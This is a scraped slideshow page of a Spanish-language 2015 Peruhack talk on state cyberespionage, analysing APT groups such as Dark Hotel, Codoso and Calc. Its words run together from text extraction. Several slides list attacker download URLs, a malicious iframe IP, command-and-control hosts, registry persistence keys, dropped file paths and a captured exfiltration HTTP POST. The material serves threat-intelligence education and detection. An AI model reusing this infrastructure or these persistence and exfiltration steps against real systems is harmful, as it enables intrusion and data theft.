Peruhack 2015 - Cyberespionaje de Naciones
•
0 j'aime•113 vues
Cyberespionaje de Naciones
Recommandé
Contenu connexe
Plus de Mauricio Velazco
Plus de Mauricio Velazco (20)
Dernier
Dernier (16)
Peruhack 2015 - Cyberespionaje de Naciones
- 2. #whoami ▪ SecurityGeek(6+anhos) ▪ BlueTeam:GestiondeVulns,RespuestaaIncidentes, ThreatIntelligence,etc. ▪ ThreatHunting ▪ AlgunasCerts: OCSP,CEH,CPTE,ECSA ▪ @mvelazco
- 3. Cyber Espionaje ▪ Elusodeataquesinformaticosparaobteneraccesoa informacionconfidencialoconfinesdesabotaje. ▪ Tipicamentellevadoacaboporungobierno;bien estructuradoyconaccesoarecursos~ilimitados ▪ APT(AdvancedPersistentThreat)
- 4. Stuxnet - Agosto 2010 ▪ Operacion“OlympicGames” ▪ EEEUeIsrael ▪ Objetivo:afectarelenriquicimientodeUranioenlacentral nucleardeNatanz,Iran ▪ Exploto4 Zero Days ▪ Limahack2011
- 5. APT 1 Report – Febrero 2013 http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
- 6. Mayo 2014
- 8. OPM – Junio 2015
- 9. Hacking Team – Julio 2015
- 10. Cómo lo hacen ?
- 11. The Cyber Kill Chain Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains Lockheed Martin, 2011
- 12. RSA - 2011
- 13. Analisis Tecnico
- 14. Dark Hotel Team ▪ GrupodecyberespionajeconnexosaCoreadelSuractivo desdeel2010. ▪ Enfocadoencomprometerorganizacionesasociadascon diplomacia,politicainternacional,seguridad&defensa. ▪ Gobiernosatacadosincluyen:Japon,Taiwan,China,Rusia, TailandiayUSA.
- 15. Dark Hotel Team – TTPs ▪ Correos“SpearPhishing”utilizandotemasdeinterespara lasvictimas ▪ Hautilizadovulnerabilidades0day ▪ CVE-2014-0497yCVE-2009-4324 ▪ Troyanohechoamedida:Tapaoux ▪ MetodosdeInfeccion ▪ BinariosconRight-to-leftoverride(RTLO) ▪ ArchivosHTA ▪ Macrosembebidas ▪ ScriptsJavascript
- 16. Dark Hotel Team – TTPs ▪ RTLOesuncaracterUnicode(U+202e)diseñadopara soportarlenguajesqueseescribendederechaaizquierda. ▪ Estecaracterpuedeserabusadoparahacercreerque archivosmaliciososnoloson.
- 17. Dark Hotel Team – TTPs
- 18. Dark Hotel Team – Campanha #1 ▪ SpearPhishingconunarchivoraratachadoquecontiene unbinarioutilizandoRTLO:letter_rcs.jpg. ▪ Alejecutarse,elbinarioescribe: ▪ letter_rcs.jpg–Imageninocua ▪ u.js–ScriptJavascriptmalicioso ▪ EnWindows,pordefecto,abrirunarchivoconextension .JSinvoca Windowsscriptinghost(WSH). a wscript.exe
- 19. Dark Hotel Team – Campanha #1
- 20. Dark Hotel Team – Campanha #1 ▪ U.jsdescargayejecutaotroJavscriptde hxxp://xxx.info/decod9/unzip.js ▪ Unzip.jsdescarga hxxp://xxx.info/open99/office32loguardaen %TEMP%csrtsrm.exe yloejecuta(payload) ▪ Eltroyanodescargaotrosmodulosconelfindeexfiltracion ▪ Keylogger %APPDATA%MicrosoftWindowssystem64srmsr.exe ▪ DocumentScrapping %APPDATA%MicrosoftWindowssystem64xsrmsd.exe
- 21. Dark Hotel Team – Campanha #1 ▪ xsrmsd.exeencuentratodoslos.doc, .pdf, .xls, .txty creaunarchivocomprimidoconpassword 12345qwert!! ▪ Llave:HKEY_LOCAL_MACHINESOFTWAREMicrosoftActiveSetupInstalled Components{50036903-7717-484a-9345-7AE5FF85DCE9}StubPath Valor:%WINDIR%system32csntzjy.exe %APPDATA%MicrosoftWindowsExplorercsntzjy.exe
- 22. Dark Hotel Team – Campanha #2 ▪ DarkHotelcomprometiolaseguridaddehotelesdelujoy mantuvoaccesoparaserusadocuandoseanecesario. ▪ Losobjetivossonusualmentealtosejecutivosdedistintas industriasconinteresesenlaregionasiatica. ▪ Alconectarsealareddelhotel,elobjetivorecibeun mensajedeactualizaciondeGoogle Toolbar,Adobe FlashoWindows Messenger. ▪ Kaspersky
- 23. Codoso Team ▪ ActivodesdeAbril2011;tienevinculosconChina. ▪ Conduceintrusionesderedcomosoporteparaunesfuerzo decolecciondeinteligenciaglobal ▪ Verticalesafectadasincluyen ▪ Energia ▪ Finanzas ▪ Defenss ▪ Gobierno ▪ DisidentesPoliticos
- 24. Codoso Team - TTPs ▪ SpearPhishingemails ▪ Waterholing ▪ Hanutilizadovulnerabidades0day ▪ Troyanohechoamedida:Mad Hatter/Codoso ▪ Utilizancorreosseñueloscontemasrelacioadosa problemasconChina,eventosmundialesypolitica internacional.
- 25. Codoso Team – Campanha 1 ▪ Ennoviembredel2014,Codosoinfectolaconocidaweb forbes.com einyectouniframemalicioso: http://74.207.254.87/83a08vkzvt/8hthrx.swf ▪ Elobjectivo:explotar2vulnerabilidades0dayenFlash Player(CVE-2014-9163)eInternetExplorer9+ (CVE-2015-0071) ▪ SiesXPsoloseutilizaCVE-2014-9163,perosies Vista+exploitatambienIEparabypasseasASLR
- 26. Codoso Team – Campanha 1 ▪ Checks
- 27. Codoso Team – Campanha 1 ▪ ElexploitdescargaunaDLL(wuservice.dll)ylacarga en memoria. ▪ EstaDLLenumeraelequipoejecutandocomandosde reconocimiento:systeminfo, ipconfig, tasklist. ▪ EnvialainformacionrecaudadaenelVIEWSTATEbase 64 ▪ UnasegundaDLLcifradaconXOR(0x67)esdescargadae inyectadaenmemoria.
- 28. Calc Team ▪ Activodesdeel2009,grupodeespionajeconnexosa China. ▪ HistoricamentesusobjetivoshansidoTaiwanyUSAconel finderecolectarinteligencia. ▪ Tecnicapreferida:Correoselectronicos+ingenieriasocial utilizandosiempretemasdegeopolitica. ▪ Explotovulnerabilidadesyaparchadas ▪ Utiliza3“familias”demalware
- 29. Calc Team – Campanha 1 ▪ Spearphishing,“G20 Briefing Paper.zip” que contiene2binariosmaliciosos(.exe) ▪ G20DiscussionPaper.exe ▪ GPFIWorkPlan2013.exe ▪ LosbinariosescribenyabrenunarchivoPDFlegitimocon elvisorpordefecto. ▪ Secopiaa%TEMP%, ycreaunallavederegistropara serejecutadocuandoelequipoinicia (KeyLoggery dropper) ▪ Alcopiarse,seejecutaconelparametro“again”ycontacta astatus.acmetoy.com
- 30. Calc Team – Campanha 1
- 31. Calc Team – Campanha 1
- 32. Calc Team – Campanha 2 ▪ Noviembre2015,APEC ▪ BriefingPaperonthePresident'sScheduleduringtheAPEC LeadersMeeting.zip ▪ Hojadecalculo(.xls)conunmacroobfuscadoembebido. ▪ Escribe ▪ %TEMP%AELMEntertainmentbudgetandAttendanceallowance.xls ▪ %TEMP%1C234643A8A8.tmp–Scriptdelimpieza ▪ %TEMP%1C224643A8B8.js –MalwareenJS ▪ HKCUSoftwareMicrosoftWindowsCurrentVersionRun network
- 33. Calc Team – Campanha 2
- 34. Calc Team – Campanha 2
- 35. Calc Team – Campanha 2
- 36. Calc Team – Campanha 2 ▪ POST/common.phpHTTP/1.1 Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0(compatible;MSIE9.0;WindowsNT6.1; Trident/5.0) Referer:https://www.google.com Content-Length:248 Accept:*/* Host:presentation.twilightXXXXXX.com Connection:Keep-Alive action=aaa&data=NzQzMDFjYzNjOWVmOTBiNDIzZDdiNDI 0ZDI2NDNiMGZ8MTcyLjE2LjI1NS4yfFdJTFNPTk5FTEx ZfFdJTFNPTk5FTExZXEFkbWluaXN0cmF0b3IoYWRta W5pc3RyYXRvcil8TWljcm9zb2Z0IFdpbmRvd3MgWF AgUHJvZmVzc2lvbmFsfDE3Mi4xNi4yNTUuMTo4ODg 4fGpzbmVbMS40XSxpbXB0LHByfA%3D%3D
- 37. Winnti Team ▪ Identificadoen2009 ▪ Susataqueshansidoenfocadosalaindustriadejuegos primariamentepararobarcertificadosdigitalesque permitansoportenactividadesdecyberespionajeaotros objetivos. ▪ Nexosconotrosgruposdeespionajeconloscuales compartecertificadosdigitales
- 38. X Team
- 39. X Team
- 40. X Team
- 41. X Team
- 42. X Team
- 43. Conclusiones ▪ AdvancedPersistentThreat? ▪ ElCyberEsiponajecontinuaraimplementandocuanta tecnicapuedasiempreycuandoseaefectiva ▪ Gruposdeespionajeorientalesutilizanlainformacion recaudaparafortacelersuindustriainernamientrasque occidentetieneotrosfines. ▪ Sudamerica?Peru?